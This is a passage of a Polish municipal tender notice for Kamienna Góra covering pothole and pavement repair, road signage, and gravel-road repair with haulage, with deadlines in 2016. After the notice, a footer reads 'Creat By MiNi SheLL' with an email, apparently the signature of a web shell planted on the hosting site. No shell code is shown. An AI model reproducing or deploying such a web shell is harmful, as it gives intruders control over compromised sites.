-	oczyszczenie wyboju z zanieczyszczeń, pyłu i ewentualnie wody,
-	skropienie dna i bocznych ścianek wyboju,
-	rozłożenie mieszanki mineralno - asfaltowej,
-	zagęszczenie rozłożonej mieszanki.
2. Napraw powierzchniowych uszkodzeń (w tym wybojów) przy użyciu specjalnych remonterów poprzez wprowadzenie pod ciśnieniem mieszanki kruszywa zmodyfikowaną emulsją asfaltową w oczyszczone sprężonym powietrzem uszkodzenia.
3. Prac związanych z bieżącym utrzymaniem infrastruktury drogowej, polegających w szczególności na:
-remoncie cząstkowym nawierzchni z kostki betonowej 8cm, ułożonej na podsypce cementowo-piaskowej,
-remoncie cząstkowym nawierzchni z płyt betonowych 35cm x 35cm, ułożonych na podsypce cementowo-piaskowej,
-ustawieniu obrzeża betonowego 8cm x 30cm x 100cm,
-przestawieniu krawężnika kamiennego na podsypce cementowo-piaskowej, wraz z wcześniejszym wykonaniem ławy z oporem z betonu (C12/15 - B15),
-remoncie cząstkowym nawierzchni z kostki kamiennej nieregularnej ułożonej na podsypce cementowo-piaskowej 9/11cm,
-remoncie cząstkowym nawierzchni z kostki kamiennej nieregularnej ułożonej na podsypce cementowo-piaskowej 16/18cm.
Wykonawca zobowiązany jest mieć dostęp do korzystania z wytwórni stacjonarnej (otoczarni) o mieszaniu cyklicznym lub ciągłym do wytwarzania mieszanek mineralno-asfaltowych o standardzie I.
Przewidziane do realizacji roboty będą realizowane do wysokości środków przeznaczonych na ten cel przez Zamawiającego i będą się odbywały na zasadach określonych w Istotnych postanowieniach umowy.

Sposób wykonania i odbioru prac będących przedmiotem niniejszego postępowania opisany jest w specyfikacji technicznej wykonania i odbioru robót, stanowiącej załącznik do opisu przedmiotu zamówienia.

Prace należy wycenić w oparciu o kalkulację cenową, stanowiącą załącznik do Formularza oferty.

Rozliczenie z Wykonawcą nastąpi kosztorysem powykonawczym.

Ilość robót przewidziana do wykonania będzie uzależniona od rzeczywistych potrzeb Zamawiającego. W przypadku zmniejszenia zakresu rzeczowego robót nie przewiduje się ponownego negocjowania cen jednostkowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie oznakowania pionowego i poziomego stałej organizacji ruchu oraz bieżące uzupełnianie oznakowania drogowego na drogach Gminy Miejskiej Kamienna Góra.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są prace polegające na wykonaniu oznakowania pionowego i poziomego stałej organizacji ruchu, zmian do istniejącej organizacji ruchu oraz bieżącym uzupełnianiu oznakowania drogowego według potrzeb Zamawiającego.

Wyszczególnienie elementów przewidzianych do realizacji:

1.	Demontaż znaków/tabliczek
2.	Demontaż wysięgników
3.	Demontaż słupków znaków
4.	Montaż słupków z odzysku
5.	Słupki z rury stalowej ocynkowanej średnicy 60mm wraz z montażem
6.	Słupki gięte z rury stalowej ocynkowanej średnicy 60mm wraz z montażem
7.	Wysięgniki z rury stalowej ocynkowanej średnicy 60mm wraz z montażem
8.	Montaż znaków z odzysku
9.	Znaki ostrzegawcze A-7 wielkości średnie pokryte folią odblaskową typu 2 wraz z montażem
10.	Znaki ostrzegawcze wielkości małe pokryte folią odblaskową typu 1 wraz z montażem
11.	Znaki zakazu wielkości średnie B-20 pokryte folią odblaskową typu 1 wraz z montażem
12.	Znaki zakazu wielkości małe B-2 pokryte folią odblaskową typu 2 wraz z montażem
13.	Znaki zakazu i nakazu wielkości średnie pokryte folią odblaskową typu 1 wraz z montażem
14.	Znaki zakazu i nakazu wielkości małe pokryte folią odblaskową typu 1 wraz z montażem
15.	Znaki informacyjne D-6 wielkości małe pokryte folią odblaskową typu 2 wraz z montażem
16.	Znaki informacyjne wielkości małe pokryte folią odblaskową typu 1 wraz z montażem
17.	Znaki informacyjne D-40, D-41, D-46, D-47 pokryte folią odblaskową typu 1 wraz z montażem
18.	Tabliczki pod znaki pokryte folią odblaskową typu 1 wraz z montażem
19.	Znaki U-9 do oznakowania skrajni drogowej pokryte folią odblaskową typu 1 wraz z montażem
20.	Pozostałe znaki drogowe pokryte folią odblaskową typu 1 wraz z montażem
21.	Znaki drogowe pokryte folią odblaskową bez montażu
22.	Wykonanie oznakowania poziomego (znaki P-10, P-19, P-20, P-21, P-24) w technologii cienkowarstwowej
23.	Usuwanie starego oznakowania poziomego poprzez frezowanie lub piaskowanie
24.	Lustro prostokątne
25.	Słupek ozdobny 
26.	Poprawa słupka
27.	Tablice drogowe u-3-d
28.	Oznakowanie poziome masą chemoutwardzalną
29.	Montaż słupka wyjmowanego
30.	Lustro drogowe

Sposób wykonania i odbioru prac będących przedmiotem niniejszego postępowania opisany jest w specyfikacji technicznej wykonania i odbioru robót, stanowiącej załącznik do opisu przedmiotu zamówienia.

Prace należy wycenić w oparciu o kalkulację cenową, stanowiącą załącznik do Formularza oferty.

Rozliczenie z Wykonawcą nastąpi kosztorysem powykonawczym.

Ilość prac przewidziana do wykonania będzie uzależniona od rzeczywistych potrzeb Zamawiającego. W przypadku zmniejszenia zakresu rzeczowego prac nie przewiduje się ponownego negocjowania cen jednostkowych.

Przewidziane do realizacji prace będą realizowane do wysokości środków przeznaczonych na ten cel przez Zamawiającego i będą się odbywały na zasadach określonych w Istotnych postanowieniach umowy.
Jeżeli prace nie będą odpowiadały opisowi pozycji w kalkulacji cenowej, Wykonawca uzgodni z Zamawiającym ceny jednostkowe tych prac. 

Konstrukcja i sposób umieszczania oznakowania pionowego, poziomego, urządzeń bezpieczeństwa ruchu drogowego oraz inne elementy oznakowania powinna być zgodna z rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r., nr 220, poz. 2181).


Wymiary i zdjęcia słupka ozdobnego oraz wyjmowanego:

Słupek ozdobny (poz. 25 Kalkulacji cenowej): 
- długość całkowita: 90 cm
- obwód: ok. 25 cm
- średnica: 80 mm




Słupek wyjmowany (poz. 29 Kalkulacji cenowej):
- długość całkowita: 115 cm
- długość (części) słupka wystającej ponad nawierzchnię: 90 cm
- obwód: ok. 25 cm
- średnica: 80 mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4, 50.23.00.00-6, 34.99.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Naprawa nawierzchni dróg gruntowych oraz transport kruszyw i ziemi na drogach Gminy Miejskiej Kamienna Góra.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót polegających na naprawie nawierzchni dróg gruntowych i terenów wskazanych przez Zamawiającego oraz transport kruszyw i ziemi.

W ramach niniejszego zamówienia przewiduje się m.in.:
1.	Pracę samochodu 10t wraz z operatorem.
2.	Pracę koparko-ładowarki wraz z operatorem.
3.	Pracę samochodu pod koparkę 10t wraz z operatorem.
4.	Pracę zagęszczarki płytowo-wibracyjnej wraz z operatorem. 
Sposób wykonania i odbioru robót będących przedmiotem niniejszego zamówienia opisany jest w specyfikacji technicznej wykonania i odbioru robót, stanowiącej załącznik do opisu przedmiotu zamówienia.

Roboty należy wycenić w oparciu o kalkulację cenową, stanowiącą załącznik do Formularza oferty.

Rozliczenie z Wykonawcą nastąpi kosztorysem powykonawczym.

Ilość robót przewidziana do wykonania będzie uzależniona od rzeczywistych potrzeb Zamawiającego. W przypadku zmniejszenia zakresu rzeczowego prac nie przewiduje się ponownego negocjowania cen jednostkowych.

Przewidziane do realizacji roboty będą realizowane do wysokości środków przeznaczonych na ten cel przez Zamawiającego i będą się odbywały na zasadach określonych w Istotnych postanowieniach umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.34.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com